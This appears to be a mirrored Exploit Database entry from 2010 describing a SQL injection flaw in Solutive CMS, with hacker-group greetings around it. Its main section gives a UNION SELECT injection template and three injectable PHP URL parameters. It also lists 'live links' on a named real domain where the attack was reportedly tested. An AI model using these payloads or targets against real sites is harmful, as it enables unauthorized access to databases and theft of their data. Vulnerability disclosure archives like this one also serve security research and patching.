Solutive CMS – SQL Injection

• Exploit Database
• 16 阅读

• 作者： Th3 RDX
  日期： 2010-04-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12041/

• -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   L0v3 T0 : "R00T", "R45c4l" & "Agent: 1c3c0ld"
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  ##############################################################################
  %//
  
  ----- [ Founder ] -----
  
  Th3 RDX
  
  ----- [ E - mail ] -----
  
   th3rdx@gmail.com
  
  
  %\\
  ##############################################################################
  
  ##############################################################################
  %//
  
  ----- [Title] -----
  
  Solutive CMS SQL Injection Vulnerability
  
  ----- [ Vendor ] -----
  
  創造有影響力的數碼體驗
  
  
  %\\
  ##############################################################################
  
  ##############################################################################
  %//
  
  ----- [ Exploit (s) ] -----
  
  Put [CODE] = SQL Injection Code
  
  {e.g = product_detail.php?id=7+and+1=0+ Union Select1 ,2,
  UNHEX(HEX([visible]))
  ,4,5,6 (tables & column) }
  
  [SQLi] http://server/cms/product_detail.php?id=7[CODE]
  
  [SQLi] http://server/cms/news_content.php?id=9[CODE]
  
  [SQLi] http://server/cms/products_by_cat.php?Cat_id=1[CODE]
  
  
  %\\
  ##############################################################################
  
  ##############################################################################
  %//
  
  >>>>>> TESTED ON <<<<<<
  
  ----- [ Live Link (s) ] -----
  
  [Link] http://solutive.net/cms01/product_detail.php?id=7[CODE]
  
  [Link] http://solutive.net/cms01/news_content.php?id=9[CODE]
  
  [Link] http://solutive.net/cms01/products_by_cat.php?Cat_id=1[CODE]
  
  %\\
  ##############################################################################
  
  
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Bug discovered : 04 April 2010
  
  finish(0);
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=